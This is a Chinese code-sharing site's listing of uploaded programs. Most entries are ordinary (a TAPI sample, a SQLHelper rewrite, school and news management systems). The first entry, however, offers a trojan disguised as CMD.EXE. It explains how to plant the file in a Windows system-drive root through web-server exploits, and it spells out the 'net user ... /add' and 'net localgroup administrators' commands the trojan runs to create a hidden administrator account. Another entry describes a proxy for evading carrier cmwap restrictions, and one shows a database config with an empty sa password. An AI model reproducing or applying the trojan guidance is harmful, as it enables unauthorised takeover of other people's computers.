你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
上传时间: 2015-01-12
上传用户:qlpqlq
The TapiComm sample uses both the Telephony API and the Win32 Communications API to demonstrate one way to implement a very simple TTY application. While the user interface and TTY emulation are very rudimentary, the TAPI and comm modules are fairly complete.
标签: Communications demonstrate API Telephony
上传时间: 2014-12-07
上传用户:chenxichenyue
重写了微软提供SQLHelper(共用的数据库调用接口) 1把SqlHelper的connectionString做成一个全局量,统一设置数据库连接字符串 2增加了返回特定表名的DataSet的各接口。 可在项目的config文件设置数据库连接字符串 private static string connectionString = System.Configuration.ConfigurationSettings.AppSettings["ConnectionString"] <!-- application specific settings --> <appSettings> <add key="ConnectionString" value="packet size=4096 user id=sa data source=localhost persist security info=True initial catalog=NorthWind password= "/> </appSettings> 当然可以把数据库连接方法修改后直接用。
标签: connectionString SQLHelper SqlHelper 微软
上传时间: 2013-12-12
上传用户:钓鳌牧马
An implementation of the TCP/IP protocol suite for the LINUX operating system. INET is implemented using the BSD Socket interface as the means of communication with the user level.
标签: implementation implemented the operating
上传时间: 2015-02-25
上传用户:xuanjie
1、本系统采用B/S架构,是学校智能办公系统的一部分,菜单中的“用户管理”、“权限管理”、“菜单管理”、“帮助主题”已集成在办公系统之中,因此本系统不提供这几项功能。 2、本系统采用集中管理、分工合作的方式,将用户分为五个级别,每个级别的用户只能使用相应的功能,因此,能公平、公正、公开地考评各位教师的教学质量。 3、支持多人同时操作和远程操作,大大缩短数据录入时间。 安装和使用注意事项: 1、将压缩文件解压到IIS目录后,运行cjcl目录下的reg.bat。 2、系统内置五个用户:系统管理、学校领导、成绩录入、班主任、一般用户,其中前四个用户的密码均为1,而一般用户在登录页面只需点提交,一般用户只提供查询功能。 3、使用前先由学校领导创建新任务,录入学校信息、教师信息、班信息等,再由班主任录入学生信息,最后由成绩录入员录入学生成绩。 4、在数据库中的user表中更改或增加用户,在jbqx表中更改每个级别的权限。 如有建议或疑问请与作者联系。
标签: 架构
上传时间: 2015-03-11
上传用户:qlpqlq
本系统为内部系统,帐户由管理员添加、管理; 分为两个组,User组和Boss组。Boss组的帐户可以发广播通知; 任意两个用户间可以互相通信; 数据库接口用DAO,网络通信用 CSocket+CSocketFile;
标签:
上传时间: 2015-03-16
上传用户:小儒尼尼奥
一套非常好的新闻管理系统,小虫新闻管理系统 V1.0(jsp+javabean+mysql) 1.解压缩 (如解压缩到D:\tomcat4\webapps\ROOT\news目录下) 2.进入classes目录,打开news.txt。 修改mysql.url(数据库联接地址及数据库名),mysql.user(用户名),mysql.password(密码),ilog(数据库联接池日志文件,请注意路径分隔符为“\\”,在linux中是“/”); 3.建数据库,并将database目录下news.sql导入;news.sql中37行中用户可修改你想要的密码,但用户名admin不能更改,否则不能实现超级管理员的功能 4.运行管理文件 --> admin/index.jsp 对系统进行一些基本设置(首先添加栏目)
上传时间: 2015-03-27
上传用户:q123321
A language monitor provides a full duplex communications path between the print spooler and bi-directional printers that are capable of providing software-accessible status information and adds printer control information, such as commands defined by a printer job language, to the data stream s.
标签: communications language bi-direc provides
上传时间: 2015-03-29
上传用户:comua
The ICA/BSS algorithms are pure mathematical formulas, powerful, but rather mechanical procedures: There is not very much left for the user to do after the machinery has been optimally implemented. The successful and efficient use of the ICALAB strongly depends on a priori knowledge, common sense and appropriate use of the preprocessing and postprocessing tools. In other words, it is preprocessing of data and postprocessing of models where expertise is truly ne
标签: mathematical algorithms mechanical procedures
上传时间: 2015-03-31
上传用户:silenthink
在J2ME中实现虚拟代理,然后过滤user-agent ,用于突破广东移动等的cmwap限制 使用方法,启动后将相应软件(如Opera)的代理设成localhost 8080,即可
上传时间: 2014-01-12
上传用户:aappkkee
